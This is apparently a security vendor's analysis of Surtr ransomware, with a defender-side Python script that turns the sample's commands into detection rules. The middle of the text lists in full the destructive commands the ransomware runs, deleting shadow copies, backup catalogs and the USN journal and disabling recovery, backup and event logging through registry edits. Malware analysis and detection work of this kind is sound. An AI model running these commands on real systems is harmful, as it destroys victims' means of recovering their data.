Through internal monitoring, the ASEC analysis team has recently discovered that Surtr ransomware is being distributed. This ransomware encrypts files, then appends the extension "[DycripterSupp@mailfence.com].[<random string>].Surtr" after each file's original extension.
When Surtr ransomware infects a system, it changes the desktop image of the infected PC and creates a ransom note (See Figures 1 and 2) to inform the user of the ransomware infection. Surtr also creates ransom note files (SURTR_README.hta and SURTR_README.txt) in folders containing the infected files.
Before the actual file encryption, Surtr carries out various preparatory tasks, such as looking up the country of the host's IP address, checking the list of running processes, and terminating services.
First, the ransomware opens a socket to "ip-api.com" (an IP geolocation service) and looks up the country in which the file is being executed. If the file is executed in a certain country, it halts execution after displaying a message box, as shown in the figure below.
After checking whether it is being debugged or run in a sandbox, Surtr deletes the files in the Recycle Bin and creates the following directories, which are used to store the files created during execution and a copy of the ransomware file itself.
- C:\ProgramData\Service
- %TEMP%\Service
It also includes logic that checks the running services and processes on the target system against the strings defined within the file (See Figures 5 and 6).
It then executes the following commands, which resize the shadow copy storage and delete the shadow copies on all defined drives, disable the recovery environment, and turn off Windows Backup and System Restore through policy registry keys, making it difficult for users to recover their original files after the infection.
vssadmin resize shadowstorage /for= /on= /maxsize=401MB
vssadmin resize shadowstorage /on= /maxsize=unbounded
vssadmin.exe Delete Shadows /all /quiet
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
fsutil.exe usn deletejournal /D C:
wbadmin.exe delete catalog -quiet
schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
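As an added defender-side example (not part of the ASEC report), the following Python script turns the recovery-inhibition commands listed above into detection rules and runs them over constructed process-creation events shaped like Sysmon Event ID 1 fields, flagging a parent process that spawns several distinct techniques rather than alerting on any single vssadmin call. The event records, PIDs and command lines in SAMPLE_EVENTS are constructed.

```python
import re

# Detection rules derived from the recovery-inhibition commands Surtr runs (listed above).
# Label -> case-insensitive regex over a process command line.
RULES = {
    "shadow_storage_resize":  r"\bvssadmin(\.exe)?\s+resize\s+shadowstorage\b",
    "shadow_copy_delete":     r"\bvssadmin(\.exe)?\s+delete\s+shadows\b",
    "recovery_env_disable":   r"\bbcdedit(\.exe)?\s+/set\s+\{default\}\s+(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b",
    "usn_journal_delete":     r"\bfsutil(\.exe)?\s+usn\s+deletejournal\b",
    "backup_catalog_delete":  r"\bwbadmin(\.exe)?\s+delete\s+catalog\b",
    "restore_task_disable":   r'\bschtasks(\.exe)?\s+/change\s+/tn\s+"?\\?microsoft\\windows\\systemrestore\\sr"?\s+/disable\b',
    "backup_policy_tamper":   r'\breg(\.exe)?\s+add\s+"?hk(ey_local_machine|lm)\\software\\policies\\microsoft\\windows\\backup\\(client|server)\b',
    "restore_policy_tamper":  r'\breg(\.exe)?\s+add\s+"?hk(ey_local_machine|lm)\\software\\policies\\microsoft\\windows( nt)?\\(systemrestore|winre)\b',
    "eventlog_logger_disable": r'\breg(\.exe)?\s+add\s+"?hk(ey_local_machine|lm)\\system\\currentcontrolset\\control\\wmi\\autologger\\eventlog-system\b',
}
COMPILED = {name: re.compile(pat, re.IGNORECASE) for name, pat in RULES.items()}

def classify(cmdline):
    """Return the labels of every rule the command line matches (in RULES order)."""
    return [name for name, rx in COMPILED.items() if rx.search(cmdline)]

def find_recovery_inhibition(events, threshold=3):
    """Group rule hits by parent PID and return parents with at least `threshold`
    distinct techniques. A lone vssadmin call is common in admin scripts; a cluster
    of different techniques from one parent is what the routine above looks like."""
    by_parent = {}
    for ev in events:
        hits = classify(ev["cmdline"])
        if hits:
            by_parent.setdefault(ev["ppid"], set()).update(hits)
    return {ppid: techs for ppid, techs in by_parent.items() if len(techs) >= threshold}

# Constructed process-creation events in the shape of Sysmon Event ID 1 fields (not real telemetry).
SAMPLE_EVENTS = [
    {"pid": 4101, "ppid": 3988, "cmdline": "vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB"},
    {"pid": 4102, "ppid": 3988, "cmdline": "vssadmin.exe Delete Shadows /all /quiet"},
    {"pid": 4103, "ppid": 3988, "cmdline": "bcdedit /set {default} recoveryenabled No"},
    {"pid": 4104, "ppid": 3988, "cmdline": "wbadmin.exe delete catalog -quiet"},
    {"pid": 4105, "ppid": 3988, "cmdline": r"reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f"},
    {"pid": 5120, "ppid": 2200, "cmdline": "vssadmin list shadows"},  # benign: listing, not deleting
    {"pid": 5121, "ppid": 2200, "cmdline": r"reg add HKCU\Software\Contoso /v Theme /t REG_SZ /d dark /f"},  # benign
]

if __name__ == "__main__":
    for ppid, techs in find_recovery_inhibition(SAMPLE_EVENTS).items():
        print(f"parent PID {ppid}: {len(techs)} recovery-inhibition techniques: {sorted(techs)}")
```

Only parent PID 3988 is reported; the two benign commands under parent 2200 match no rule.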
Furthermore, the ransomware encrypts files on all drives, except for files with the extensions "surt," "dll," "exe," and "lnk" (See Figure 7) and files under certain paths, which are exempt from encryption (See Figure 8).
After encrypting the files, Surtr performs additional behaviors such as creating ransom notes and deleting event logs, as shown in Figure 9.
AhnLab’s anti-malware software, V3, detects and responds to Surtr ransomware with a variety of detection points, including file detection and behavior-based detection. To prevent ransomware infection, users must be cautious of running files from unknown sources and make sure to scan suspicious files with an anti-malware program while also keeping the program updated to the latest version. AhnLab’s anti-malware software, V3, detects and blocks the malware using the following aliases:
[File Detection]
- Ransomware/Win.Generic.C5285743 (2022.10.25.02)
[Behavior Detection]
- Ransom/MDP.Nemty.M2599
[IOC Info]
- ad539ebdf9e34e02be487134cf9a6713
- e31b96b8a74075935360b5e5a18926e9
- 674e7ee905d24a89af47b53b53ffc23c
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.